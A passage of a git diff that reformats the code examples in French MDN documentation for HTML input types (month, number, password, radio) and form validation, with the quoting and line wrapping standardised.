     L'évènement `search` est soumis à des limites de fréquence propres à chaque implémentation.
+
 - `orient` {{non-standard_inline}}
   - : Semblable à la propriété CSS non-standard `-moz-orient` pour les éléments [`<progress>`](/fr/docs/Web/HTML/Element/Progress) et [`<meter>`](/fr/docs/Web/HTML/Element/Meter), cet attribut définit l'orientation de la piste du curseur. Les valeurs possibles pour cet attribut sont `horizontal` (la piste est affichée horizontalement) et `vertical` (la piste est affichée verticalement).
 - `results` {{non-standard_inline}}
@@ -655,7 +695,7 @@ Les champs de formulaire sont des éléments remplacés et disposent de quelques
 On peut mettre en forme le libellé d'une case à cocher selon que la case est cochée ou non. Dans cet exemple, on adapte les propriétés [`color`](/fr/docs/Web/CSS/color) et [`font-weight`](/fr/docs/Web/CSS/font-weight) de l'élément [`<label>`](/fr/docs/Web/HTML/Element/Label) situé immédiatement après une case cochée. On applique aucune mise en forme si l'élément `<input>` n'est pas coché.
 
 ```html hidden
-<input id="checkboxInput" type="checkbox">
+<input id="checkboxInput" type="checkbox" />
 <label for="checkboxInput">Activer/désactiver la case à cocher</label>
 ```
 
@@ -674,13 +714,16 @@ Il est possible de cibler différents types de contrôles en fonction de la vale
 
 ```css
 /* Cible un champ de saisie d'un mot de passe */
-input[type="password"] {}
+input[type="password"] {
+}
 
 /* Cible un contrôle de formulaire dont l'intervalle des valeurs valides est délimité par attributs */
-input[min][max] {}
+input[min][max] {
+}
 
 /* Cible un contrôle de formulaire utilisant un attribut pattern */
-input[pattern] {}
+input[pattern] {
+}
 ```
 
 ### `::placeholder`
@@ -711,7 +754,7 @@ Utiliser `appearance: none` permettra de retirer les bordures liées à la plate
 
 ```html
 <label for="textInput">Vous noterez le curseur rouge :</label>
-<input id="textInput" class="custom" size="32">
+<input id="textInput" class="custom" size="32" />
 ```
 
 #### CSS
@@ -719,7 +762,10 @@ Utiliser `appearance: none` permettra de retirer les bordures liées à la plate
 ```css
 input.custom {
   caret-color: red;
-  font: 16px "Helvetica", "Arial", "sans-serif"
+  font:
+    16px "Helvetica",
+    "Arial",
+    "sans-serif";
 }
 ```
 
@@ -757,13 +803,20 @@ Il ne suffit pas d'avoir un texte normal à côté de l'élément `<input>`. Pou
 
 ```html
 <!-- inaccessible -->
-<p>Veuillez saisir votre nom : <input id="name" type="text" size="30"></p>
+<p>Veuillez saisir votre nom : <input id="name" type="text" size="30" /></p>
 
 <!-- libellé implicite -->
-<p><label>Veuillez saisir votre nom : <input id="name" type="text" size="30"></label></p>
+<p>
+  <label
+    >Veuillez saisir votre nom : <input id="name" type="text" size="30"
+  /></label>
+</p>
 
 <!-- libellé explicite -->
-<p><label for="name">Veuillez saisir votre nom : </label><input id="name" type="text" size="30"></p>
+<p>
+  <label for="name">Veuillez saisir votre nom : </label
+  ><input id="name" type="text" size="30" />
+</p>
 ```
 
 Le premier exemple est inaccessible&nbsp;: il n'y a aucune relation entre la consigne de saisie et l'élément `<input>`.
@@ -791,7 +844,7 @@ Certains types de champ et attributs imposent des limites aux valeurs possibles 
 Pour les types de champ dont le domaine des valeurs possibles est périodique (autrement dit après avoir atteint la plus grande valeur, on revient à la plus petite), il est possible d'avoir des valeurs d'attribut [`max`](#max) inférieures à celles de [`min`](#min). Cela est particulièrement utile pour les dates et les heures, par exemple pour autoriser les heures entre 8h du soir et 8h du matin&nbsp;:
 
 ```html
-<input type="time" min="20:00" max="08:00" name="overnight">
+<input type="time" min="20:00" max="08:00" name="overnight" />
 ```
 
 Certains attributs et valeurs peuvent causer une erreur [`ValidityState`](/fr/docs/Web/API/ValidityState) spécifique&nbsp;:
@@ -877,13 +930,13 @@ S'il y a une erreur, les navigateurs qui prennent en charge la validation averti
 function validate(input) {
   let validityState_object = input.validity;
   if (validityState_object.valueMissing) {
-     input.setCustomValidity('Une valeur est nécessaire.');
+    input.setCustomValidity("Une valeur est nécessaire.");
   } else if (validityState_object.rangeUnderflow) {
-    input.setCustomValidity('La valeur est trop basse.');
+    input.setCustomValidity("La valeur est trop basse.");
   } else if (validityState_object.rangeOverflow) {
-    input.setCustomValidity('La valeur est trop haute.');
+    input.setCustomValidity("La valeur est trop haute.");
   } else {
-    input.setCustomValidity('');
+    input.setCustomValidity("");
   }
 }
 ```
@@ -896,8 +949,11 @@ Si vous souhaitez afficher un message d'erreur spécifique lorsqu'un champ est i
 
 ```html
 <form>
-  <label for="name">Veuillez saisir un nom d'utilisateur (avec des lettres en minuscules ou majuscules) : </label>
-  <input type="text" name="name" id="name" required pattern="[A-Za-z]+">
+  <label for="name"
+    >Veuillez saisir un nom d'utilisateur (avec des lettres en minuscules ou
+    majuscules) :
+  </label>
+  <input type="text" name="name" id="name" required pattern="[A-Za-z]+" />
   <button>Envoyer</button>
 </form>
 ```
@@ -907,18 +963,22 @@ Les fonctionnalités HTML de base pour la validation des formulaires permettront
 Si on souhaite afficher un message d'erreur spécifique, on pourra utiliser JavaScript comme suit&nbsp;:
 
 ```js
-const nameInput = document.querySelector('input');
+const nameInput = document.querySelector("input");
 
-nameInput.addEventListener('input', () => {
-  nameInput.setCustomValidity('');
+nameInput.addEventListener("input", () => {
+  nameInput.setCustomValidity("");
   nameInput.checkValidity();
 });
 
-nameInput.addEventListener('invalid', () => {
-  if(nameInput.value === '') {
-    nameInput.setCustomValidity(`Veuillez saisir un nom d'utilisateur non vide !`);
+nameInput.addEventListener("invalid", () => {
+  if (nameInput.value === "") {
+    nameInput.setCustomValidity(
+      `Veuillez saisir un nom d'utilisateur non vide !`,
+    );
   } else {
-    nameInput.setCustomValidity(`Un nom d'utilisateur ne peut contenir que des lettres en minuscules ou majuscules. Essayez à nouveau.`);
+    nameInput.setCustomValidity(
+      `Un nom d'utilisateur ne peut contenir que des lettres en minuscules ou majuscules. Essayez à nouveau.`,
+    );
   }
 });
 ```
@@ -1077,7 +1137,7 @@ Dans l'exemple qui suit, on illustre comment associer un élément `<label>` ave
 
 ```html
 <label for="ptipois">Est-ce que vous aimez les petits pois ?</label>
-<input type="checkbox" name="petitspois" id="ptipois">
+<input type="checkbox" name="petitspois" id="ptipois" />
 ```
 
 ### Dimensionnement

--- a/files/fr/web/html/element/input/month/index.md
+++ b/files/fr/web/html/element/input/month/index.md
@@ -57,7 +57,7 @@ Il est possible de définir une valeur par défaut pour le contrôle en utilisan
 
 ```html
 <label for="bday-month">Quel est le mois de votre naissance ?</label>
-<input id="bday-month" type="month" name="bday-month" value="2017-06">
+<input id="bday-month" type="month" name="bday-month" value="2017-06" />
 ```
 
 {{EmbedLiveSample('', 600, 60)}}
@@ -72,12 +72,12 @@ Il est également possible de manipuler la date en JavaScript grâce à la propr
 
 ```html
 <label for="bday-month">Quel est le mois de votre naissance ?</label>
-<input id="bday-month" type="month" name="bday-month" value="2017-06">
+<input id="bday-month" type="month" name="bday-month" value="2017-06" />
 ```
 
 ```js
 let monthControl = document.querySelector('input[type="month"]');
-monthControl.value = '1978-06';
+monthControl.value = "1978-06";
 ```
 
 {{EmbedLiveSample("", 600, 60)}}
@@ -131,7 +131,7 @@ Dans son expression la plus simple, il suffit d'employer un élément `<input>` 
 ```html
 <form>
   <label for="bday-month">Quel est le mois de votre naissance ?</label>
-  <input id="bday-month" type="month" name="bday-month">
+  <input id="bday-month" type="month" name="bday-month" />
 </form>
 ```
 
@@ -144,8 +144,12 @@ On peut utiliser les attributs [`min`](/fr/docs/Web/HTML/Element/Input#attr-min)
 ```html
 <form>
   <label for="bday-month">Quel est le mois de votre naissance ?</label>
-  <input id="bday-month" type="month" name="bday-month"
-         min="1900-01" max="2017-08">
+  <input
+    id="bday-month"
+    type="month"
+    name="bday-month"
+    min="1900-01"
+    max="2017-08" />
 </form>
 ```
 
@@ -172,12 +176,17 @@ Prenons un exemple avec une période délimitée et un champ obligatoire&nbsp;:
 <form>
   <div>
     <label for="month">À quel mois souhaitez-vous venir cet été ?</label>
-    <input id="month" type="month" name="month"
-           min="2017-06" max="2017-09" required>
+    <input
+      id="month"
+      type="month"
+      name="month"
+      min="2017-06"
+      max="2017-09"
+      required />
     <span class="validity"></span>
   </div>
   <div>
-      <input type="submit" value="Envoyer le formulaire">
+    <input type="submit" value="Envoyer le formulaire" />
   </div>
 </form>
 ```
@@ -206,15 +215,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -242,14 +251,22 @@ Une façon de contourner ce problème consiste à utiliser l'attribut [`pattern`
 ```html
 <form>
   <div>
-    <label for="month">À quel mois souhaitez-vous venir cet été ? (utilisez le format yyyy-mm)</label>
-    <input id="month" type="month" name="month"
-           min="2017-06" max="2017-09" required
-           pattern="[0-9]{4}-[0-9]{2}">
+    <label for="month"
+      >À quel mois souhaitez-vous venir cet été ? (utilisez le format
+      yyyy-mm)</label
+    >
+    <input
+      id="month"
+      type="month"
+      name="month"
+      min="2017-06"
+      max="2017-09"
+      required
+      pattern="[0-9]{4}-[0-9]{2}" />
     <span class="validity"></span>
   </div>
   <div>
-      <input type="submit" value="Envoyer le formulaire">
+    <input type="submit" value="Envoyer le formulaire" />
   </div>
 </form>
 ```
@@ -274,15 +291,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -301,7 +318,7 @@ Voici le fragment de code HTML utilisé&nbsp;:
 <form>
   <div class="nativeDatePicker">
     <label for="month-visit">À quel mois souhaitez-vous venir cet été ?</label>
-    <input type="month" id="month-visit" name="month-visit">
+    <input type="month" id="month-visit" name="month-visit" />
     <span class="validity"></span>
   </div>
   <p class="fallbackLabel">À quel mois souhaitez-vous venir cet été ?</p>
@@ -326,8 +343,7 @@ Voici le fragment de code HTML utilisé&nbsp;:
       </span>
       <span>
         <label for="year">Année :</label>
-        <select id="year" name="year">
-        </select>
+        <select id="year" name="year"></select>
       </span>
     </div>
   </div>
@@ -350,15 +366,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -367,27 +383,27 @@ Une partie intéressante du code est celle qui permet de détecter la prise en c
 
 ```js
 // On définit des variables
-let nativePicker = document.querySelector('.nativeDatePicker');
-let fallbackPicker = document.querySelector('.fallbackDatePicker');
-let fallbackLabel = document.querySelector('.fallbackLabel');
+let nativePicker = document.querySelector(".nativeDatePicker");
+let fallbackPicker = document.querySelector(".fallbackDatePicker");
+let fallbackLabel = document.querySelector(".fallbackLabel");
 
-let yearSelect = document.querySelector('#year');
-let monthSelect = document.querySelector('#month');
+let yearSelect = document.querySelector("#year");
+let monthSelect = document.querySelector("#month");
 
 // Par défaut on masque le sélecteur alternatif
-fallbackPicker.style.display = 'none';
-fallbackLabel.style.display = 'none';
+fallbackPicker.style.display = "none";
+fallbackLabel.style.display = "none";
 
 // On teste si un nouveau contrôle est automatiquement
 // converti en un champ texte
-let test = document.createElement('input');
-test.type = 'month';
+let test = document.createElement("input");
+test.type = "month";
 // Si c'est le cas, on exécute le code dans ce bloc if
-if(test.type === 'text') {
+if (test.type === "text") {
   // on masque le sélecteur natif et on masque le sélecteur alternatif
-  nativePicker.style.display = 'none';
-  fallbackPicker.style.display = 'block';
-  fallbackLabel.style.display = 'block';
+  nativePicker.style.display = "none";
+  fallbackPicker.style.display = "block";
+  fallbackLabel.style.display = "block";
 
   // on génère les valeurs pour les années
   populateYears();
@@ -400,9 +416,9 @@ function populateYears() {
 
   // On ajoute l'année courante et les 100 années à venir
   // dans l'élément <select> pour l'année
-  for(let i = 0; i <= 100; i++) {
-    let option = document.createElement('option');
-    option.textContent = year-i;
+  for (let i = 0; i <= 100; i++) {
+    let option = document.createElement("option");
+    option.textContent = year - i;
     yearSelect.appendChild(option);
   }
 }

--- a/files/fr/web/html/element/input/number/index.md
+++ b/files/fr/web/html/element/input/number/index.md
@@ -44,7 +44,7 @@ Le navigateur peut agrémenter le contrôle avec des flèches afin d'incrémente
 Un nombre qui représente la valeur saisie dans le contrôle. Il est possible d'indiquer une valeur par défaut en utilisant l'attribut [`value`](/fr/docs/Web/HTML/Element/Input#attr-value)&nbsp;:
 
 ```html
-<input id="number" type="number" value="42">
+<input id="number" type="number" value="42" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -110,7 +110,7 @@ Dans sa forme la plus simple, on peut implémenter un contrôle de saisie numér
 
 ```html
 <label for="ticketNum">Nombre de tickets à acheter :</label>
-<input id="ticketNum" type="number" name="ticketNum" value="0">
+<input id="ticketNum" type="number" name="ticketNum" value="0" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -126,7 +126,7 @@ Il est parfois utile de fournir une indication quant à la valeur qui devrait ê
 Dans l'exemple qui suit, on utilise un élément `<input>` de type `number` avec le texte indicatif `Multiple de 10`. Vous pouvez noter la façon dont le texte disparaît/réapparaît à selon la présence ou l'absence de valeur dans le champ.
 
 ```html
-<input type="number" placeholder="Multiple de 10">
+<input type="number" placeholder="Multiple de 10" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -136,7 +136,7 @@ Dans l'exemple qui suit, on utilise un élément `<input>` de type `number` avec
 Par défaut, les curseurs fournis pour incrémenter/décrémenter la valeur utilisent un pas de 1. Ce comportement par défaut peut être changé en utilisant l'attribut [`step`](/fr/docs/Web/HTML/Element/Input#attr-step) dont la valeur représente le pas d'incrémentation. Dans l'exemple qui suit et parce que le texte informatif indique "Multiple de 10", on utilise un pas de 10 grâce à l'attribut `step`&nbsp;:
 
 ```html
-<input type="number" placeholder="Multiple de 10" step="10">
+<input type="number" placeholder="Multiple de 10" step="10" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -148,7 +148,7 @@ Dans cet exemple, on peut voir que les curseurs permettent d'augmenter ou de ré
 Les attributs `min` et `max` peuvent être employés afin d'indiquer les bornes de l'intervalle dans lequel doit se situer la valeur. Par exemple, avec le fragment HTML suivant, on indique que le minimum vaut 0 et que le maximum vaut 100&nbsp;:
 
 ```html
-<input type="number" placeholder="Multiple de 10" step="10" min="0" max="100">
+<input type="number" placeholder="Multiple de 10" step="10" min="0" max="100" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -160,7 +160,7 @@ Dans cet exemple, les curseurs ne permettent pas de dépasser 100 ou de saisir u
 Par défaut, l'incrément d'un tel contrôle vaut 1 et si on saisit la valeur `1.0`, elle sera considérée invalide. Si on souhaite pouvoir saisir une valeur qui contient une partie décimale, on pourra utiliser l'attribut `step` (par exemple, on pourra utiliser `step="0.01"` pour autoriser des nombres avec deux chiffres après la virgule)&nbsp;:
 
 ```html
-<input type="number" placeholder="1.0" step="0.01" min="0" max="10">
+<input type="number" placeholder="1.0" step="0.01" min="0" max="10" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -174,7 +174,13 @@ Les éléments [`<input>`](/fr/docs/Web/HTML/Element/Input) de type `number` ne 
 Par exemple, si on souhaite réduire la largeur du contrôle, car il ne permet que de saisir un nombre à trois chiffres, on ajoute un identifiant sur l'élément et on réduit le texte indicatif afin qu'il ne soit pas tronqué&nbsp;:
 
 ```html
-<input type="number" placeholder="x10" step="10" min="0" max="100" id="number">
+<input
+  type="number"
+  placeholder="x10"
+  step="10"
+  min="0"
+  max="100"
+  id="number" />
 ```
 
 On ajoute ensuite une déclaration CSS dans la feuille de style pour l'élément avec un identifiant `number`&nbsp;:
@@ -194,15 +200,15 @@ Le résultat ressemblera à&nbsp;:
 Il est possible de fournir une liste d'options par défaut parmi lesquelles l'utilisatrice ou l'utilisateur pourra choisir. Pour cela, on renseignera l'attribut [`list`](/fr/docs/Web/HTML/Element/Input#attr-list) dont la valeur est l'identifiant (attribut `id`) d'un élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) contenant autant d'éléments [`<option>`](/fr/docs/Web/HTML/Element/Option) que de valeurs suggérées. La valeur de l'attribut `value` de chaque élément `<option>` sera utilisée comme suggestion pour la saisie dans le contrôle.
 
 ```html
-<input id="ticketNum" type="number" name="ticketNum" list="defaultNumbers">
+<input id="ticketNum" type="number" name="ticketNum" list="defaultNumbers" />
 <span class="validity"></span>
 
 <datalist id="defaultNumbers">
-  <option value="10045678">
-  <option value="103421">
-  <option value="11111111">
-  <option value="12345678">
-  <option value="12999922">
+  <option value="10045678"></option>
+  <option value="103421"></option>
+  <option value="11111111"></option>
+  <option value="12345678"></option>
+  <option value="12999922"></option>
 </datalist>
 ```
 
@@ -223,11 +229,18 @@ L'exemple suivant illustre l'ensemble de ces fonctionnalités et quelques règle
 <form>
   <div>
     <label for="balloons">Quantité de ballons à commander (par 10) :</label>
-    <input id="balloons" type="number" name="balloons" step="10" min="0" max="100" required>
+    <input
+      id="balloons"
+      type="number"
+      name="balloons"
+      step="10"
+      min="0"
+      max="100"
+      required />
     <span class="validity"></span>
   </div>
   <div>
-    <input type="submit">
+    <input type="submit" />
   </div>
 </form>
 ```
@@ -243,13 +256,13 @@ div {
   margin-bottom: 10px;
 }
 
-input:invalid+span:after {
-  content: '✖';
+input:invalid + span:after {
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
-  content: '✓';
+input:valid + span:after {
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -274,23 +287,33 @@ Dans l'exemple suivant, on crée un formulaire qui permet de saisir la taille d'
 <form>
   <div class="metersInputGroup">
     <label for="meters">Saisir votre taille — en mètres :</label>
-    <input id="meters" type="number" name="meters" step="0.01" min="0" placeholder="p. ex. 1.78" required>
+    <input
+      id="meters"
+      type="number"
+      name="meters"
+      step="0.01"
+      min="0"
+      placeholder="p. ex. 1.78"
+      required />
     <span class="validity"></span>
   </div>
   <div class="feetInputGroup" style="display: none;">
     <span>Saisir votre taille — </span>
     <label for="feet">pieds :</label>
-    <input id="feet" type="number" name="feet" min="0" step="1">
+    <input id="feet" type="number" name="feet" min="0" step="1" />
     <span class="validity"></span>
     <label for="inches">pouces :</label>
-    <input id="inches" type="number" name="inches" min="0" max="11" step="1">
+    <input id="inches" type="number" name="inches" min="0" max="11" step="1" />
     <span class="validity"></span>
   </div>
   <div>
-    <input type="button" class="meters" value="Saisir la taille en pieds/pouces">
+    <input
+      type="button"
+      class="meters"
+      value="Saisir la taille en pieds/pouces" />
   </div>
   <div>
-    <input type="submit" value="Envoyer">
+    <input type="submit" value="Envoyer" />
   </div>
 </form>
 ```
@@ -315,15 +338,15 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -331,39 +354,39 @@ input:valid+span:after {
 Enfin, voici le code JavaScript utilisé&nbsp;:
 
 ```js
-let metersInputGroup = document.querySelector('.metersInputGroup');
-let feetInputGroup = document.querySelector('.feetInputGroup');
-let metersInput = document.querySelector('#meters');
-let feetInput = document.querySelector('#feet');
-let inchesInput = document.querySelector('#inches');
+let metersInputGroup = document.querySelector(".metersInputGroup");
+let feetInputGroup = document.querySelector(".feetInputGroup");
+let metersInput = document.querySelector("#meters");
+let feetInput = document.querySelector("#feet");
+let inchesInput = document.querySelector("#inches");
 let switchBtn = document.querySelector('input[type="button"]');
 
-switchBtn.addEventListener('click', function() {
-  if(switchBtn.getAttribute('class') === 'meters') {
-    switchBtn.setAttribute('class', 'feet');
-    switchBtn.value = 'Saisir la taille en mètres';
+switchBtn.addEventListener("click", function () {
+  if (switchBtn.getAttribute("class") === "meters") {
+    switchBtn.setAttribute("class", "feet");
+    switchBtn.value = "Saisir la taille en mètres";
 
-    metersInputGroup.style.display = 'none';
-    feetInputGroup.style.display = 'block';
+    metersInputGroup.style.display = "none";
+    feetInputGroup.style.display = "block";
 
-    feetInput.setAttribute('required', '');
-    inchesInput.setAttribute('required', '');
-    metersInput.removeAttribute('required');
+    feetInput.setAttribute("required", "");
+    inchesInput.setAttribute("required", "");
+    metersInput.removeAttribute("required");
 
-    metersInput.value = '';
+    metersInput.value = "";
   } else {
-    switchBtn.setAttribute('class', 'meters');
-    switchBtn.value = 'Saisir la taille en pieds';
+    switchBtn.setAttribute("class", "meters");
+    switchBtn.value = "Saisir la taille en pieds";
 
-    metersInputGroup.style.display = 'block';
-    feetInputGroup.style.display = 'none';
+    metersInputGroup.style.display = "block";
+    feetInputGroup.style.display = "none";
 
-    feetInput.removeAttribute('required');
-    inchesInput.removeAttribute('required');
-    metersInput.setAttribute('required', '');
+    feetInput.removeAttribute("required");
+    inchesInput.removeAttribute("required");
+    metersInput.setAttribute("required", "");
 
-    feetInput.value = '';
-    inchesInput.value = '';
+    feetInput.value = "";
+    inchesInput.value = "";
   }
 });
 ```

--- a/files/fr/web/html/element/input/password/index.md
+++ b/files/fr/web/html/element/input/password/index.md
@@ -107,7 +107,7 @@ Voici un exemple simple illustrant un contrôle de saisie d'un mot de passe qui 
 
 ```html
 <label for="userPassword">Mot de passe :</label>
-<input id="userPassword" type="password">
+<input id="userPassword" type="password" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -127,7 +127,7 @@ Afin de permettre au gestionnaire de mots de passe de saisir automatiquement le 
 
 ```html
 <label for="userPassword">Mot de passe :</label>
-<input id="userPassword" type="password" autocomplete="current-password">
+<input id="userPassword" type="password" autocomplete="current-password" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -138,7 +138,7 @@ Pour indiquer à l'utilisatrice ou l'utilisateur que le mot de passe est obligat
 
 ```html
 <label for="userPassword">Mot de passe :</label>
-<input id="userPassword" type="password" required>
+<input id="userPassword" type="password" required />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -149,7 +149,7 @@ Si votre application utilise un autre mode de saisie que le mode par défaut, l'
 
 ```html
 <label for="pin">PIN :</label>
-<input id="pin" type="password" inputmode="numeric">
+<input id="pin" type="password" inputmode="numeric" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -160,8 +160,13 @@ Les attributs [`minlength`](/fr/docs/Web/HTML/Element/Input#attr-minlength) et [
 
 ```html
 <label for="pin">PIN :</label>
-<input id="pin" type="password" inputmode="numeric" minlength="4"
-       maxlength="8" size="8">
+<input
+  id="pin"
+  type="password"
+  inputmode="numeric"
+  minlength="4"
+  maxlength="8"
+  size="8" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -174,16 +179,16 @@ Il est possible d'utiliser la méthode [`select()`](/fr/docs/Web/API/HTMLInputEl
 
 ```html
 <label for="userPassword">Mot de passe :</label>
-<input id="userPassword" type="password" size="12">
+<input id="userPassword" type="password" size="12" />
 <button id="selectAll">Sélectionner tout</button>
 ```
 
 #### JavaScript
 
 ```js
-document.getElementById("selectAll").onclick = function(event) {
+document.getElementById("selectAll").onclick = function (event) {
   document.getElementById("userPassword").select();
-}
+};
 ```
 
 #### Résultat
@@ -200,9 +205,12 @@ Dans cet exemple, il n'est possible de saisir qu'une valeur qui contient entre 4
 
 ```html
 <label for="hexId">Identifiant Hexa :</label>
-<input id="hexId" type="password" pattern="[0-9a-fA-F]{4,8}"
-       title="Veuillez saisir un identifiant avec 4 à 8 chiffres hexadécimaux."
-       autocomplete="nouveau-mot-de-passe">
+<input
+  id="hexId"
+  type="password"
+  pattern="[0-9a-fA-F]{4,8}"
+  title="Veuillez saisir un identifiant avec 4 à 8 chiffres hexadécimaux."
+  autocomplete="nouveau-mot-de-passe" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -221,10 +229,16 @@ Dans l'exemple qui suit, on construit un formulaire avec un mot de passe qui doi
 
 ```html
 <label for="ssn">SSN :</label>
-<input type="password" id="ssn" inputmode="number" minlength="9" maxlength="12"
-    pattern="(?!000)([0-6]\d{2}|7([0-6]\d|7[012]))([ -])?(?!00)\d\d\3(?!0000)\d{4}"
-    required autocomplete="off">
-<br>
+<input
+  type="password"
+  id="ssn"
+  inputmode="number"
+  minlength="9"
+  maxlength="12"
+  pattern="(?!000)([0-6]\d{2}|7([0-6]\d|7[012]))([ -])?(?!00)\d\d\3(?!0000)\d{4}"
+  required
+  autocomplete="off" />
+<br />
 <label for="ssn">Valeur :</label>
 <span id="current"></span>
 ```

--- a/files/fr/web/html/element/input/radio/index.md
+++ b/files/fr/web/html/element/input/radio/index.md
@@ -31,16 +31,13 @@ Voici le fragment de code HTML correspondant à cet exemple :
 <form>
   <p>Veuillez choisir la meilleure méthode pour vous contacter :</p>
   <div>
-    <input type="radio" id="contactChoice1"
-     name="contact" value="email">
+    <input type="radio" id="contactChoice1" name="contact" value="email" />
     <label for="contactChoice1">Email</label>
 
-    <input type="radio" id="contactChoice2"
-     name="contact" value="telephone">
+    <input type="radio" id="contactChoice2" name="contact" value="telephone" />
     <label for="contactChoice2">Téléphone</label>
 
-    <input type="radio" id="contactChoice3"
-     name="contact" value="courrier">
+    <input type="radio" id="contactChoice3" name="contact" value="courrier" />
     <label for="contactChoice3">Courrier</label>
   </div>
   <div>
@@ -71,24 +68,20 @@ Ajoutant un peu de code à notre exemple pour étudier les données générées 
 <form>
   <p>Veuillez choisir la meilleure méthode pour vous contacter :</p>
   <div>
-    <input type="radio" id="contactChoice1"
-     name="contact" value="email">
+    <input type="radio" id="contactChoice1" name="contact" value="email" />
     <label for="contactChoice1">Email</label>
 
-    <input type="radio" id="contactChoice2"
-     name="contact" value="telephone">
+    <input type="radio" id="contactChoice2" name="contact" value="telephone" />
     <label for="contactChoice2">Téléphone</label>
 
-    <input type="radio" id="contactChoice3"
-     name="contact" value="courrier">
+    <input type="radio" id="contactChoice3" name="contact" value="courrier" />
     <label for="contactChoice3">Courrier</label>
   </div>
   <div>
     <button type="submit">Envoyer</button>
   </div>
 </form>
-<pre id="log">
-</pre>
+<pre id="log"></pre>
 ```
 
 Ensuite, on ajoute du code [JavaScript](/fr/docs/Web/JavaScript) pour rattacher un gestionnaire d'évènement sur l'évènement [`submit`](/fr/docs/Web/API/HTMLFormElement/submit_event) qui est déclenché lorsque l'utilisateur clique sur le bouton « Envoyer » :
@@ -97,15 +90,19 @@ Ensuite, on ajoute du code [JavaScript](/fr/docs/Web/JavaScript) pour rattacher 
 var form = document.querySelector("form");
 var log = document.querySelector("#log");
 
-form.addEventListener("submit", function(event) {
-  var data = new FormData(form);
-  var output = "";
-  for (const entry of data) {
-    output = entry[0] + "=" + entry[1] + "\r";
-  };
-  log.innerText = output;
-  event.preventDefault();
-}, false);
+form.addEventListener(
+  "submit",
+  function (event) {
+    var data = new FormData(form);
+    var output = "";
+    for (const entry of data) {
+      output = entry[0] + "=" + entry[1] + "\r";
+    }
+    log.innerText = output;
+    event.preventDefault();
+  },
+  false,
+);
 ```
 
 Vous pouvez manipuler cet exemple et voir qu'il n'y a jamais plus 'un résultat pour le groupe `"contact"`.
@@ -116,10 +113,10 @@ Vous pouvez manipuler cet exemple et voir qu'il n'y a jamais plus 'un résultat 
 
 En complément des attributs partagés par l'ensemble des éléments {{HTMLElement("input")}}, les boutons radio peuvent utiliser les attributs suivants :
 
-| Attribut                   | Definition                                                                                                     |
-| -------------------------- | -------------------------------------------------------------------------------------------------------------- |
+| Attribut              | Definition                                                                                                     |
+| --------------------- | -------------------------------------------------------------------------------------------------------------- |
 | [`checked`](#checked) | Un attribut booléen qui indique si le bouton radio est l'élément sélectionné du groupe.                        |
-| [`value`](#value) | Une chaîne à utiliser comme valeur pour le bouton radio lors de l'envoi du formulaire si ce bouton est choisi. |
+| [`value`](#value)     | Une chaîne à utiliser comme valeur pour le bouton radio lors de l'envoi du formulaire si ce bouton est choisi. |
 
 ### `checked`
 
@@ -143,16 +140,18 @@ Pour qu'un bouton radio soit sélectionné par défaut, on ajoutera l'attribut b
 <form>
   <p>Veuillez choisir la meilleure méthode pour vous contacter :</p>
   <div>
-    <input type="radio" id="contactChoice1"
-     name="contact" value="email" checked>
+    <input
+      type="radio"
+      id="contactChoice1"
+      name="contact"
+      value="email"
+      checked />
     <label for="contactChoice1">Email</label>
 
-    <input type="radio" id="contactChoice2"
-     name="contact" value="telephone">
+    <input type="radio" id="contactChoice2" name="contact" value="telephone" />
     <label for="contactChoice2">Téléphone</label>
 
-    <input type="radio" id="contactChoice3"
-     name="contact" value="courrier">
+    <input type="radio" id="contactChoice3" name="contact" value="courrier" />
     <label for="contactChoice3">Courrier</label>
   </div>
   <div>
@@ -186,16 +185,22 @@ L'exemple qui suit est une version légèrement plus détaillée de l'exemple pr
   <fieldset>
     <legend>Veuillez choisir la meilleure méthode pour vous contacter :</legend>
     <div>
-      <input type="radio" id="contactChoice1"
-       name="contact" value="email" checked>
+      <input
+        type="radio"
+        id="contactChoice1"
+        name="contact"
+        value="email"
+        checked />
       <label for="contactChoice1">Email</label>
 
-      <input type="radio" id="contactChoice2"
-       name="contact" value="telephone">
+      <input
+        type="radio"
+        id="contactChoice2"
+        name="contact"
+        value="telephone" />
       <label for="contactChoice2">Téléphone</label>
 
-      <input type="radio" id="contactChoice3"
-       name="contact" value="courrier">
+      <input type="radio" id="contactChoice3" name="contact" value="courrier" />
       <label for="contactChoice3">Courrier</label>
     </div>
     <div>

